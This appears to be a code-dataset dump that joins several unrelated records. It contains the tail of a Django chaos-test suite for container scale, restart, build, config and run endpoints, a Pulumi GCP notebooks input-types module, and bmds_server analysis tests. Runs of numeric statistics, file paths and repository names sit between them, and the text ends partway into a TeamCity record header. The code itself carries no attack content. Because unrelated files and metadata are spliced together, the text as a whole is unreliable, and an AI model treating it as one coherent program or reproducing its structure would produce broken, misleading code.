response = self.client.get(url, HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data['results']), 1)
# scale up, which will allow some crashed containers
url = "/v1/apps/{app_id}/scale".format(**locals())
body = {'web': 20, 'worker': 20}
response = self.client.post(url, json.dumps(body), content_type='application/json',
HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 204)
# let's get chaotic
chaos.STOP_ERROR_RATE = 0.5
chaos.START_ERROR_RATE = 0.5
# reboot the web processes
url = "/v1/apps/{app_id}/containers/web/restart".format(**locals())
response = self.client.post(url,
content_type='application/json',
HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 200, response.data)
# inspect broken containers
url = "/v1/apps/{app_id}/containers".format(**locals())
response = self.client.get(url, HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.data['count'], 40)
# make sure some failed
states = set([c['state'] for c in response.data['results']])
self.assertEqual(states, set(['crashed', 'up']))
# make sure that we only rebooted the web processes
types = set([c['type'] for c in response.data['results'] if c['state'] == 'crashed'])
self.assertEqual(types, set(['web']))
# start fresh
chaos.STOP_ERROR_RATE = 0.0
chaos.START_ERROR_RATE = 0.0
url = "/v1/apps/{app_id}/containers/web/restart".format(**locals())
response = self.client.post(url,
content_type='application/json',
HTTP_AUTHORIZATION='token {}'.format(self.token))
# let the carnage continue
chaos.STOP_ERROR_RATE = 0.5
chaos.START_ERROR_RATE = 0.5
# reboot ALL the containers!
url = "/v1/apps/{app_id}/containers/restart".format(**locals())
response = self.client.post(url,
content_type='application/json',
HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 200)
# inspect broken containers
url = "/v1/apps/{app_id}/containers".format(**locals())
response = self.client.get(url, HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data['results']), 40)
# make sure some failed
states = set([c['state'] for c in response.data['results']])
self.assertEqual(states, set(['crashed', 'up']))
types = set([c['type'] for c in response.data['results']])
self.assertEqual(types, set(['web', 'worker']))
def test_destroy_chaos(self):
url = '/v1/apps'
response = self.client.post(url, HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 201)
app_id = response.data['id']
# post a new build
url = "/v1/apps/{app_id}/builds".format(**locals())
body = {'image': 'autotest/example', 'sha': 'a'*40,
'procfile': json.dumps({'web': 'node server.js', 'worker': 'node worker.js'})}
response = self.client.post(url, json.dumps(body), content_type='application/json',
HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 201)
url = "/v1/apps/{app_id}/containers".format(**locals())
response = self.client.get(url, HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data['results']), 1)
# scale up
url = "/v1/apps/{app_id}/scale".format(**locals())
body = {'web': 20}
response = self.client.post(url, json.dumps(body), content_type='application/json',
HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 204)
url = "/v1/apps/{app_id}/containers".format(**locals())
response = self.client.get(url, HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data['results']), 20)
# let's get chaotic
chaos.DESTROY_ERROR_RATE = 0.5
# scale to zero but expect a 503
url = "/v1/apps/{app_id}/scale".format(**locals())
body = {'web': 0}
response = self.client.post(url, json.dumps(body), content_type='application/json',
HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 503)
self.assertEqual(response.data, {'detail': 'aborting, failed to destroy some containers'})
self.assertEqual(response.get('content-type'), 'application/json')
# inspect broken containers
url = "/v1/apps/{app_id}/containers".format(**locals())
response = self.client.get(url, HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 200)
states = set([c['state'] for c in response.data['results']])
self.assertEqual(states, set(['error']))
# make sure we can cleanup after enough tries
containers = 20
for _ in xrange(100):
url = "/v1/apps/{app_id}/scale".format(**locals())
body = {'web': 0}
response = self.client.post(url, json.dumps(body), content_type='application/json',
HTTP_AUTHORIZATION='token {}'.format(self.token))
# break if we destroyed successfully
if response.status_code == 204:
break
self.assertEqual(response.status_code, 503)
self.assertEqual(response.data, {'detail': 'aborting, failed to '
'destroy some containers'})
self.assertEqual(response.get('content-type'), 'application/json')
# inspect broken containers
url = "/v1/apps/{app_id}/containers".format(**locals())
response = self.client.get(url, HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 200)
containers = len(response.data['results'])
def test_build_chaos(self):
url = '/v1/apps'
response = self.client.post(url, HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 201)
app_id = response.data['id']
# post a new build
url = "/v1/apps/{app_id}/builds".format(**locals())
body = {'image': 'autotest/example', 'sha': 'a'*40,
'procfile': json.dumps({'web': 'node server.js', 'worker': 'node worker.js'})}
response = self.client.post(url, json.dumps(body), content_type='application/json',
HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 201)
# inspect builds
url = "/v1/apps/{app_id}/builds".format(**locals())
response = self.client.get(url, HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data['results']), 1)
# inspect releases
url = "/v1/apps/{app_id}/releases".format(**locals())
response = self.client.get(url, HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data['results']), 2)
url = "/v1/apps/{app_id}/containers".format(**locals())
response = self.client.get(url, HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data['results']), 1)
# scale up
url = "/v1/apps/{app_id}/scale".format(**locals())
body = {'web': 20}
response = self.client.post(url, json.dumps(body), content_type='application/json',
HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 204)
# simulate failing to create containers
chaos.CREATE_ERROR_RATE = 0.5
chaos.START_ERROR_RATE = 0.5
# post a new build
url = "/v1/apps/{app_id}/builds".format(**locals())
body = {'image': 'autotest/example', 'sha': 'b'*40,
'procfile': json.dumps({'web': 'node server.js', 'worker': 'node worker.js'})}
response = self.client.post(url, json.dumps(body), content_type='application/json',
HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 503)
self.assertEqual(response.data, {'detail': 'aborting, failed to create some containers'})
self.assertEqual(response.get('content-type'), 'application/json')
# inspect releases
url = "/v1/apps/{app_id}/releases".format(**locals())
response = self.client.get(url, HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data['results']), 2)
# inspect containers
url = "/v1/apps/{app_id}/containers".format(**locals())
response = self.client.get(url, HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data['results']), 20)
# make sure all old containers are still up
states = set([c['state'] for c in response.data['results']])
self.assertEqual(states, set(['up']))
def test_config_chaos(self):
url = '/v1/apps'
response = self.client.post(url, HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 201)
app_id = response.data['id']
# post a new build
url = "/v1/apps/{app_id}/builds".format(**locals())
body = {'image': 'autotest/example', 'sha': 'a'*40,
'procfile': json.dumps({'web': 'node server.js', 'worker': 'node worker.js'})}
response = self.client.post(url, json.dumps(body), content_type='application/json',
HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 201)
# inspect releases
url = "/v1/apps/{app_id}/releases".format(**locals())
response = self.client.get(url, HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data['results']), 2)
url = "/v1/apps/{app_id}/containers".format(**locals())
response = self.client.get(url, HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data['results']), 1)
# scale up
url = "/v1/apps/{app_id}/scale".format(**locals())
body = {'web': 20}
response = self.client.post(url, json.dumps(body), content_type='application/json',
HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 204)
# simulate failing to create or start containers
chaos.CREATE_ERROR_RATE = 0.5
chaos.START_ERROR_RATE = 0.5
# post a new config
url = "/v1/apps/{app_id}/config".format(**locals())
body = {'values': json.dumps({'NEW_URL1': 'http://localhost:8080/'})}
response = self.client.post(url, json.dumps(body), content_type='application/json',
HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 503)
self.assertEqual(response.data, {'detail': 'aborting, failed to create some containers'})
self.assertEqual(response.get('content-type'), 'application/json')
# inspect releases
url = "/v1/apps/{app_id}/releases".format(**locals())
response = self.client.get(url, HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data['results']), 2)
# inspect containers
url = "/v1/apps/{app_id}/containers".format(**locals())
response = self.client.get(url, HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data['results']), 20)
# make sure all old containers are still up
states = set([c['state'] for c in response.data['results']])
self.assertEqual(states, set(['up']))
def test_run_chaos(self):
url = '/v1/apps'
response = self.client.post(url, HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 201)
app_id = response.data['id']
# post a new build
url = "/v1/apps/{app_id}/builds".format(**locals())
body = {'image': 'autotest/example', 'sha': 'a'*40,
'procfile': json.dumps({'web': 'node server.js', 'worker': 'node worker.js'})}
response = self.client.post(url, json.dumps(body), content_type='application/json',
HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 201)
# inspect builds
url = "/v1/apps/{app_id}/builds".format(**locals())
response = self.client.get(url, HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data['results']), 1)
# inspect releases
url = "/v1/apps/{app_id}/releases".format(**locals())
response = self.client.get(url, HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data['results']), 2)
url = "/v1/apps/{app_id}/containers".format(**locals())
response = self.client.get(url, HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data['results']), 1)
# block all create operations
chaos.CREATE_ERROR_RATE = 1
# make sure the run fails with a 503
url = '/v1/apps/{app_id}/run'.format(**locals())
body = {'command': 'ls -al'}
response = self.client.post(url, json.dumps(body), content_type='application/json',
HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 503)
self.assertEqual(response.data, {'detail': 'exit code 1'})
self.assertEqual(response.get('content-type'), 'application/json')
| 54.809045
| 98
| 0.61048
| 2,563
| 21,814
| 5.099493
| 0.074132
| 0.106733
| 0.114384
| 0.113542
| 0.899158
| 0.885922
| 0.879648
| 0.875669
| 0.870543
| 0.870543
| 0
| 0.019489
| 0.237875
| 21,814
| 397
| 99
| 54.947103
| 0.766677
| 0.07023
| 0
| 0.814465
| 0
| 0
| 0.175333
| 0.062188
| 0
| 0
| 0
| 0
| 0.292453
| 1
| 0.028302
| false
| 0
| 0.025157
| 0
| 0.059748
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
733e3b9abbfc069503f5fab9a81e1eb485566103
| 17,106
|
py
|
Python
|
sdk/python/pulumi_gcp/notebooks/_inputs.py
|
sisisin/pulumi-gcp
|
af6681d70ea457843409110c1324817fe55f68ad
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_gcp/notebooks/_inputs.py
|
sisisin/pulumi-gcp
|
af6681d70ea457843409110c1324817fe55f68ad
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_gcp/notebooks/_inputs.py
|
sisisin/pulumi-gcp
|
af6681d70ea457843409110c1324817fe55f68ad
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = [
'EnvironmentContainerImageArgs',
'EnvironmentVmImageArgs',
'InstanceAcceleratorConfigArgs',
'InstanceContainerImageArgs',
'InstanceIamBindingConditionArgs',
'InstanceIamMemberConditionArgs',
'InstanceReservationAffinityArgs',
'InstanceShieldedInstanceConfigArgs',
'InstanceVmImageArgs',
]
@pulumi.input_type
class EnvironmentContainerImageArgs:
def __init__(__self__, *,
repository: pulumi.Input[str],
tag: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] repository: The path to the container image repository.
For example: gcr.io/{project_id}/{imageName}
:param pulumi.Input[str] tag: The tag of the container image. If not specified, this defaults to the latest tag.
"""
pulumi.set(__self__, "repository", repository)
if tag is not None:
pulumi.set(__self__, "tag", tag)
@property
@pulumi.getter
def repository(self) -> pulumi.Input[str]:
"""
The path to the container image repository.
For example: gcr.io/{project_id}/{imageName}
"""
return pulumi.get(self, "repository")
@repository.setter
def repository(self, value: pulumi.Input[str]):
pulumi.set(self, "repository", value)
@property
@pulumi.getter
def tag(self) -> Optional[pulumi.Input[str]]:
"""
The tag of the container image. If not specified, this defaults to the latest tag.
"""
return pulumi.get(self, "tag")
@tag.setter
def tag(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "tag", value)
@pulumi.input_type
class EnvironmentVmImageArgs:
def __init__(__self__, *,
project: pulumi.Input[str],
image_family: Optional[pulumi.Input[str]] = None,
image_name: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] project: The name of the Google Cloud project that this VM image belongs to.
Format: projects/{project_id}
:param pulumi.Input[str] image_family: Use this VM image family to find the image; the newest image in this family will be used.
:param pulumi.Input[str] image_name: Use VM image name to find the image.
"""
pulumi.set(__self__, "project", project)
if image_family is not None:
pulumi.set(__self__, "image_family", image_family)
if image_name is not None:
pulumi.set(__self__, "image_name", image_name)
@property
@pulumi.getter
def project(self) -> pulumi.Input[str]:
"""
The name of the Google Cloud project that this VM image belongs to.
Format: projects/{project_id}
"""
return pulumi.get(self, "project")
@project.setter
def project(self, value: pulumi.Input[str]):
pulumi.set(self, "project", value)
@property
@pulumi.getter(name="imageFamily")
def image_family(self) -> Optional[pulumi.Input[str]]:
"""
Use this VM image family to find the image; the newest image in this family will be used.
"""
return pulumi.get(self, "image_family")
@image_family.setter
def image_family(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "image_family", value)
@property
@pulumi.getter(name="imageName")
def image_name(self) -> Optional[pulumi.Input[str]]:
"""
Use VM image name to find the image.
"""
return pulumi.get(self, "image_name")
@image_name.setter
def image_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "image_name", value)
@pulumi.input_type
class InstanceAcceleratorConfigArgs:
def __init__(__self__, *,
core_count: pulumi.Input[int],
type: pulumi.Input[str]):
"""
:param pulumi.Input[int] core_count: Count of cores of this accelerator.
:param pulumi.Input[str] type: Type of this accelerator.
Possible values are `ACCELERATOR_TYPE_UNSPECIFIED`, `NVIDIA_TESLA_K80`, `NVIDIA_TESLA_P100`, `NVIDIA_TESLA_V100`, `NVIDIA_TESLA_P4`, `NVIDIA_TESLA_T4`, `NVIDIA_TESLA_T4_VWS`, `NVIDIA_TESLA_P100_VWS`, `NVIDIA_TESLA_P4_VWS`, `NVIDIA_TESLA_A100`, `TPU_V2`, and `TPU_V3`.
"""
pulumi.set(__self__, "core_count", core_count)
pulumi.set(__self__, "type", type)
@property
@pulumi.getter(name="coreCount")
def core_count(self) -> pulumi.Input[int]:
"""
Count of cores of this accelerator.
"""
return pulumi.get(self, "core_count")
@core_count.setter
def core_count(self, value: pulumi.Input[int]):
pulumi.set(self, "core_count", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of this accelerator.
Possible values are `ACCELERATOR_TYPE_UNSPECIFIED`, `NVIDIA_TESLA_K80`, `NVIDIA_TESLA_P100`, `NVIDIA_TESLA_V100`, `NVIDIA_TESLA_P4`, `NVIDIA_TESLA_T4`, `NVIDIA_TESLA_T4_VWS`, `NVIDIA_TESLA_P100_VWS`, `NVIDIA_TESLA_P4_VWS`, `NVIDIA_TESLA_A100`, `TPU_V2`, and `TPU_V3`.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@pulumi.input_type
class InstanceContainerImageArgs:
def __init__(__self__, *,
repository: pulumi.Input[str],
tag: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] repository: The path to the container image repository.
For example: gcr.io/{project_id}/{imageName}
:param pulumi.Input[str] tag: The tag of the container image. If not specified, this defaults to the latest tag.
"""
pulumi.set(__self__, "repository", repository)
if tag is not None:
pulumi.set(__self__, "tag", tag)
@property
@pulumi.getter
def repository(self) -> pulumi.Input[str]:
"""
The path to the container image repository.
For example: gcr.io/{project_id}/{imageName}
"""
return pulumi.get(self, "repository")
@repository.setter
def repository(self, value: pulumi.Input[str]):
pulumi.set(self, "repository", value)
@property
@pulumi.getter
def tag(self) -> Optional[pulumi.Input[str]]:
"""
The tag of the container image. If not specified, this defaults to the latest tag.
"""
return pulumi.get(self, "tag")
@tag.setter
def tag(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "tag", value)
@pulumi.input_type
class InstanceIamBindingConditionArgs:
def __init__(__self__, *,
expression: pulumi.Input[str],
title: pulumi.Input[str],
description: Optional[pulumi.Input[str]] = None):
pulumi.set(__self__, "expression", expression)
pulumi.set(__self__, "title", title)
if description is not None:
pulumi.set(__self__, "description", description)
@property
@pulumi.getter
def expression(self) -> pulumi.Input[str]:
return pulumi.get(self, "expression")
@expression.setter
def expression(self, value: pulumi.Input[str]):
pulumi.set(self, "expression", value)
@property
@pulumi.getter
def title(self) -> pulumi.Input[str]:
return pulumi.get(self, "title")
@title.setter
def title(self, value: pulumi.Input[str]):
pulumi.set(self, "title", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@pulumi.input_type
class InstanceIamMemberConditionArgs:
def __init__(__self__, *,
expression: pulumi.Input[str],
title: pulumi.Input[str],
description: Optional[pulumi.Input[str]] = None):
pulumi.set(__self__, "expression", expression)
pulumi.set(__self__, "title", title)
if description is not None:
pulumi.set(__self__, "description", description)
@property
@pulumi.getter
def expression(self) -> pulumi.Input[str]:
return pulumi.get(self, "expression")
@expression.setter
def expression(self, value: pulumi.Input[str]):
pulumi.set(self, "expression", value)
@property
@pulumi.getter
def title(self) -> pulumi.Input[str]:
return pulumi.get(self, "title")
@title.setter
def title(self, value: pulumi.Input[str]):
pulumi.set(self, "title", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@pulumi.input_type
class InstanceReservationAffinityArgs:
def __init__(__self__, *,
consume_reservation_type: pulumi.Input[str],
key: Optional[pulumi.Input[str]] = None,
values: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
:param pulumi.Input[str] consume_reservation_type: The type of Compute Reservation.
Possible values are `NO_RESERVATION`, `ANY_RESERVATION`, and `SPECIFIC_RESERVATION`.
:param pulumi.Input[str] key: Corresponds to the label key of reservation resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] values: Corresponds to the label values of reservation resource.
"""
pulumi.set(__self__, "consume_reservation_type", consume_reservation_type)
if key is not None:
pulumi.set(__self__, "key", key)
if values is not None:
pulumi.set(__self__, "values", values)
@property
@pulumi.getter(name="consumeReservationType")
def consume_reservation_type(self) -> pulumi.Input[str]:
"""
The type of Compute Reservation.
Possible values are `NO_RESERVATION`, `ANY_RESERVATION`, and `SPECIFIC_RESERVATION`.
"""
return pulumi.get(self, "consume_reservation_type")
@consume_reservation_type.setter
def consume_reservation_type(self, value: pulumi.Input[str]):
pulumi.set(self, "consume_reservation_type", value)
@property
@pulumi.getter
def key(self) -> Optional[pulumi.Input[str]]:
"""
Corresponds to the label key of reservation resource.
"""
return pulumi.get(self, "key")
@key.setter
def key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "key", value)
@property
@pulumi.getter
def values(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Corresponds to the label values of reservation resource.
"""
return pulumi.get(self, "values")
@values.setter
def values(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "values", value)
@pulumi.input_type
class InstanceShieldedInstanceConfigArgs:
def __init__(__self__, *,
enable_integrity_monitoring: Optional[pulumi.Input[bool]] = None,
enable_secure_boot: Optional[pulumi.Input[bool]] = None,
enable_vtpm: Optional[pulumi.Input[bool]] = None):
"""
:param pulumi.Input[bool] enable_integrity_monitoring: Defines whether the instance has integrity monitoring enabled. Enables monitoring and attestation of the
boot integrity of the instance. The attestation is performed against the integrity policy baseline.
This baseline is initially derived from the implicitly trusted boot image when the instance is created.
Enabled by default.
:param pulumi.Input[bool] enable_secure_boot: Defines whether the instance has Secure Boot enabled. Secure Boot helps ensure that the system only runs
authentic software by verifying the digital signature of all boot components, and halting the boot process
if signature verification fails.
Disabled by default.
:param pulumi.Input[bool] enable_vtpm: Defines whether the instance has the vTPM enabled.
Enabled by default.
"""
if enable_integrity_monitoring is not None:
pulumi.set(__self__, "enable_integrity_monitoring", enable_integrity_monitoring)
if enable_secure_boot is not None:
pulumi.set(__self__, "enable_secure_boot", enable_secure_boot)
if enable_vtpm is not None:
pulumi.set(__self__, "enable_vtpm", enable_vtpm)
@property
@pulumi.getter(name="enableIntegrityMonitoring")
def enable_integrity_monitoring(self) -> Optional[pulumi.Input[bool]]:
"""
Defines whether the instance has integrity monitoring enabled. Enables monitoring and attestation of the
boot integrity of the instance. The attestation is performed against the integrity policy baseline.
This baseline is initially derived from the implicitly trusted boot image when the instance is created.
Enabled by default.
"""
return pulumi.get(self, "enable_integrity_monitoring")
@enable_integrity_monitoring.setter
def enable_integrity_monitoring(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_integrity_monitoring", value)
@property
@pulumi.getter(name="enableSecureBoot")
def enable_secure_boot(self) -> Optional[pulumi.Input[bool]]:
"""
Defines whether the instance has Secure Boot enabled. Secure Boot helps ensure that the system only runs
authentic software by verifying the digital signature of all boot components, and halting the boot process
if signature verification fails.
Disabled by default.
"""
return pulumi.get(self, "enable_secure_boot")
@enable_secure_boot.setter
def enable_secure_boot(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_secure_boot", value)
@property
@pulumi.getter(name="enableVtpm")
def enable_vtpm(self) -> Optional[pulumi.Input[bool]]:
"""
Defines whether the instance has the vTPM enabled.
Enabled by default.
"""
return pulumi.get(self, "enable_vtpm")
@enable_vtpm.setter
def enable_vtpm(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_vtpm", value)
@pulumi.input_type
class InstanceVmImageArgs:
def __init__(__self__, *,
project: pulumi.Input[str],
image_family: Optional[pulumi.Input[str]] = None,
image_name: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] project: The name of the Google Cloud project that this VM image belongs to.
Format: projects/{project_id}
:param pulumi.Input[str] image_family: Use this VM image family to find the image; the newest image in this family will be used.
:param pulumi.Input[str] image_name: Use VM image name to find the image.
"""
pulumi.set(__self__, "project", project)
if image_family is not None:
pulumi.set(__self__, "image_family", image_family)
if image_name is not None:
pulumi.set(__self__, "image_name", image_name)
@property
@pulumi.getter
def project(self) -> pulumi.Input[str]:
"""
The name of the Google Cloud project that this VM image belongs to.
Format: projects/{project_id}
"""
return pulumi.get(self, "project")
@project.setter
def project(self, value: pulumi.Input[str]):
pulumi.set(self, "project", value)
@property
@pulumi.getter(name="imageFamily")
def image_family(self) -> Optional[pulumi.Input[str]]:
"""
Use this VM image family to find the image; the newest image in this family will be used.
"""
return pulumi.get(self, "image_family")
@image_family.setter
def image_family(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "image_family", value)
@property
@pulumi.getter(name="imageName")
def image_name(self) -> Optional[pulumi.Input[str]]:
"""
Use VM image name to find the image.
"""
return pulumi.get(self, "image_name")
@image_name.setter
def image_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "image_name", value)
| 37.431072
| 282
| 0.648837
| 2,021
| 17,106
| 5.312222
| 0.089065
| 0.105533
| 0.096498
| 0.055328
| 0.851993
| 0.793871
| 0.768349
| 0.716375
| 0.690946
| 0.679396
| 0
| 0.003167
| 0.243131
| 17,106
| 456
| 283
| 37.513158
| 0.82606
| 0.292704
| 0
| 0.665441
| 1
| 0
| 0.097122
| 0.038492
| 0
| 0
| 0
| 0
| 0
| 1
| 0.209559
| false
| 0
| 0.018382
| 0.022059
| 0.349265
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
733f40303ceb149e10491befdc3a1091de74aeee
| 2,959
|
py
|
Python
|
tests/analysis/test_models.py
|
shapiromatron/bmds-server
|
0b2b79b521728582fa66100621e9ea03e251f9f1
|
[
"MIT"
] | 1
|
2019-07-09T16:42:15.000Z
|
2019-07-09T16:42:15.000Z
|
tests/analysis/test_models.py
|
shapiromatron/bmds-server
|
0b2b79b521728582fa66100621e9ea03e251f9f1
|
[
"MIT"
] | 103
|
2016-11-14T15:58:53.000Z
|
2022-03-07T21:01:03.000Z
|
tests/analysis/test_models.py
|
shapiromatron/bmds-server
|
0b2b79b521728582fa66100621e9ea03e251f9f1
|
[
"MIT"
] | 2
|
2017-03-17T20:43:22.000Z
|
2018-01-04T19:15:18.000Z
|
import pytest
from run3 import RunBmds3
from bmds_server.analysis.models import Analysis
from bmds_server.analysis.reporting.docx import build_docx
from bmds_server.analysis.reporting.excel import build_df
@pytest.mark.django_db()
@pytest.mark.skipif(not RunBmds3.should_run, reason=RunBmds3.skip_reason)
class TestBmds3Execution:
def test_c(self, bmds3_complete_continuous):
analysis = Analysis.objects.create(inputs=bmds3_complete_continuous)
assert analysis.is_finished is False
assert analysis.has_errors is False
analysis.execute()
assert analysis.is_finished is True
assert analysis.has_errors is False
assert analysis.outputs["outputs"][0]["metadata"]["dataset_index"] == 0
assert analysis.outputs["outputs"][0]["metadata"]["option_index"] == 0
assert len(analysis.outputs["outputs"]) == 1
assert len(analysis.outputs["outputs"][0]["frequentist"]["models"]) == 1
assert len(analysis.outputs["outputs"][0]["bayesian"]["models"]) == 1
assert analysis.errors == []
# test reporting (for completion)
build_docx(analysis, "http://bmds-python.com")
build_df(analysis)
def test_ci(self, bmds3_complete_continuous_individual):
analysis = Analysis.objects.create(inputs=bmds3_complete_continuous_individual)
assert analysis.is_finished is False
assert analysis.has_errors is False
analysis.execute()
assert analysis.is_finished is True
assert analysis.has_errors is False
assert analysis.outputs["outputs"][0]["metadata"]["dataset_index"] == 0
assert analysis.outputs["outputs"][0]["metadata"]["option_index"] == 0
assert len(analysis.outputs["outputs"]) == 1
assert len(analysis.outputs["outputs"][0]["frequentist"]["models"]) == 1
assert len(analysis.outputs["outputs"][0]["bayesian"]["models"]) == 1
assert analysis.errors == []
# test reporting (for completion)
build_docx(analysis, "http://bmds-python.com")
build_df(analysis)
def test_d(self, bmds3_complete_dichotomous):
analysis = Analysis.objects.create(inputs=bmds3_complete_dichotomous)
assert analysis.is_finished is False
assert analysis.has_errors is False
analysis.execute()
assert analysis.is_finished is True
assert analysis.has_errors is False
assert analysis.outputs["outputs"][0]["metadata"]["dataset_index"] == 0
assert analysis.outputs["outputs"][0]["metadata"]["option_index"] == 0
assert len(analysis.outputs["outputs"]) == 1
assert len(analysis.outputs["outputs"][0]["frequentist"]["models"]) == 1
assert len(analysis.outputs["outputs"][0]["bayesian"]["models"]) == 1
assert analysis.errors == []
# test reporting (for completion)
build_docx(analysis, "http://bmds-python.com")
build_df(analysis)
| 39.986486
| 87
| 0.677256
| 350
| 2,959
| 5.585714
| 0.177143
| 0.150384
| 0.168798
| 0.141176
| 0.82711
| 0.795396
| 0.795396
| 0.770844
| 0.711509
| 0.711509
| 0
| 0.01596
| 0.195336
| 2,959
| 73
| 88
| 40.534247
| 0.805124
| 0.032105
| 0
| 0.735849
| 0
| 0
| 0.135315
| 0
| 0
| 0
| 0
| 0
| 0.566038
| 1
| 0.056604
| false
| 0
| 0.09434
| 0
| 0.169811
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
735f2fa8e1e516522c3120cd285b535fcc686fe2
| 66,953
|
py
|
Python
|
dohq_teamcity/api/server_api.py
|
DenKoren/teamcity
|
